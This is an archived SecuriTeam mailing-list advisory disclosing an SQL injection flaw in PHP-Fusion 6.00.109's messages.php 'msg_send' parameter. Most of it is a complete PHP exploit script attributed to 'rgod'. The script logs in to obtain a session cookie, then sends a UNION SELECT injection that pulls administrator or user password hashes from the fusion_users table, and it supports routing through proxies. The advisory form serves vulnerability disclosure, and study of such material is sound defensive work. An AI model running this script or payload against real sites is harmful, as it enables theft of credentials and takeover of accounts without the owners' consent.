|
|
|
[UNIX] PHP-Fusion msg_send SQL Injection: msg#00104security.securiteam
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html - - - - - - - - - PHP-Fusion msg_send SQL Injection ------------------------------------------------------------------------ SUMMARY <http://www.php-fusion.co.uk/> PHP-Fusion - "A light-weight open-source content management system (CMS) written in PHP. It utilizes a MySQL database to store your site content and includes a simple, comprehensive administration system." An SQL Injection vulnerability has been discovered in PHP-Fusion's messages.php script. DETAILS Vulnerable Systems: * PHP-Fusion version 6.00.109 If magic_quotes set to off, PHP-Fusion vulnerable to SQL Injection. Example: http://[target]/[path_to_Php_Fusion]/messages.php?msg_send=' UNION SELECT user_password FROM fusion_users WHERE user_name='[admin_username]'/* Now hash will be showed in "To:" field when you post a private message. Exploit: <?php # 19.17 28/09/2005 # # # # -- PhpF6_00_109xpl.php # # # # PHP-Fusion v6.00.109 SQL Injection / admin|users credentials disclosure # # # # by rgod # # site: http://rgod.altervista.org # # # # mphhh, private messages again...tze,tze # # # # make these changes in php.ini if you have troubles # # to launch this script: # # allow_call_time_pass_reference = on # # register_globals = on # # # # usage: launch this script from Apache, fill requested fields, then # # go! # # # # Sun-Tzu: "Therefore the clever combatant imposes his will on the enemy, # # but does not allow the enemy's will to be imposed on him" # error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); echo'<head><title> *** PHP-Fusion v6.00.109 SQL Injection *** </title> <meta http-equiv= "Content-Type" content="text/html; charset=iso-8859-1"> <style type="text/css"><!-- body,td,th {color:#00FF00;} body{background-color: #000000;} Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; } Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; font-style: italic; } --> </style></head><body> <p class="Stile6"> Php-Fusion v6. 00.109 SQL Injection / admin|user credentials disclosure </p><p class="Stile6"> a script by rgod at <a href="http://rgod.altervista.org"; target="_blank"> http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form name="form1" method="post" action="'.$SERVER[PHP_SELF].'?path=value&host=value &port=value&proxy=value&user=value&pass=value&username=value"> <p> <input type="text" name="host"><span class="Stile5"> hostname ( ex: www.sitename.com ) </span></p> <p> <input type="text" name="path"><span class="Stile5"> path (ex: /phpfusion/ or just /)</span></p><p> <input type="text" name="port"> <span class="Stile5">specify a port other than 80 (default value)</span></p><p> <input type="text" name="user"> <span class="Stile5">your username </span> </p> <p> <input type="text" name="pass"> <span class="Stile5">your password ( to get a valid session cookie) </span></p><p><input type="text" name="username"> <span class="Stile5">user whom you want the password </span></p><p><input type="text" name="proxy"> <span class="Stile5"> send exploit trough an HTTP proxy </span> </p> <p> <input type="submit"name="Submit" value="go!"> </p></form> </td> </tr> </table></body></html>'; function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo '<table border="0"><tr>'; while ($ii <= strlen($headeri)-1) { $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo "<td> </td>"; for ($li=0; $li<=15; $li++) { echo "<td>".$headeri[$li+$ki]."</td>"; } $ki=$ki+16; echo "</tr><tr>"; } if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else {echo "<td>".$datai."</td> ";} $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo "<td>  </td>"; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo "<td>".$headeri[$li]."</td>"; } echo "</tr></table>"; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacket() { global $proxy, $host, $port, $html, $packet; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port);} else { if (!eregi($proxy_regex,$proxy)) {echo htmlentities($proxy).' -> not a valid proxy...'; die; } $parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...'; die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,2048); } } fclose($ock); echo nl2br(htmlentities($html)); } if (($path<>'') and ($host<>'') and ($user<>'') and ($pass<>'') and ($username<>'')) { if ($port=='') {$port=80;} #STEP 1 -> login, to retrieve a session cookie... $data="user_name=".urlencode(trim($user)). "&user_pass=".urlencode(trim($pass))."&login=Login"; if ($proxy=='') {$packet="POST ".$path."news.php HTTP/1.1\r\n";} else {$packet="POST http://".$host.$path."news.php HTTP/1.1\r\n";} $packet="Referer: http://".$host.$path."/news.php\r\n";; $packet.="Accept-Language: en\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Googlebot/2.1\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Keep-Alive\r\n"; $packet.="Cache-Control: no-cache\r\n"; $packet.="Cookie: fusion_visited=yes; PHPSESSID=44ab49664b56b97036425427b1ffb8cf\r\n\r\n"; $packet.=$data; show($packet); sendpacket($packet); $temp=explode("Set-Cookie: ",$html); $temp2=explode(' ',$temp[1]); $cookie=$temp2[0]; echo '<br>Your cookie: '.htmlentities($cookie); # STEP 2 -> SQL Injection, now retrieve the MD5 password hash from database $username=str_replace("'","",$username); $sql="' UNION SELECT user_password FROM fusion_users WHERE user_name='".trim($username)."'/*"; if ($proxy=='') {$packet="GET ".$path."messages.php?msg_send=".urlencode($sql)." HTTP/1.1\r\n";} else {$packet="GET http://".$host.$path."messages.php?msg_send=".urlencode($sql)." HTTP/1.1\r\n";} $packet.="User-Agent: GameBoy, Powered by Nintendo\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n"; $packet.="Accept-Language: en\r\n"; $packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1\r\n"; $packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Cookie2: \$Version=1\r\n"; $packet.="Connection: Keep-Alive, TE\r\n"; $packet.="TE: deflate, gzip, chunked, identity, trailers\r\n\r\n"; show($packet); sendpacket($packet); if (eregi('For Members only',$html)) {echo 'You have to specify a valid session cookie...'; die; } $temp=explode("'Click to view the senders profile'>",$html); $temp2=explode("</a>",$temp[1]); $hash=$temp2[0]; echo '<br>Username: '.htmlentities($username).' Password hash: '.$hash; } else { echo '<br> Fill requested fields, optionally specify a proxy...';} ?> ADDITIONAL INFORMATION The information has been provided by <mailto:retrogod@xxxxxxxxxxxxx> rgod. ======================================== This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. |
|
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| Previous by Date: | [NT] AntiVirus Filename Bypassing: 00104, SecuriTeam |
|---|---|
| Next by Date: | [NT] 7-Zip ARJ Archive Buffer Overflow: 00104, SecuriTeam |
| Previous by Thread: | [NT] AntiVirus Filename Bypassingi: 00104, SecuriTeam |
| Next by Thread: | [NT] 7-Zip ARJ Archive Buffer Overflow: 00104, SecuriTeam |
| Indexes: | [Date] [Thread] [Top] [All Lists] |
|
|
| News | FAQ | advertise |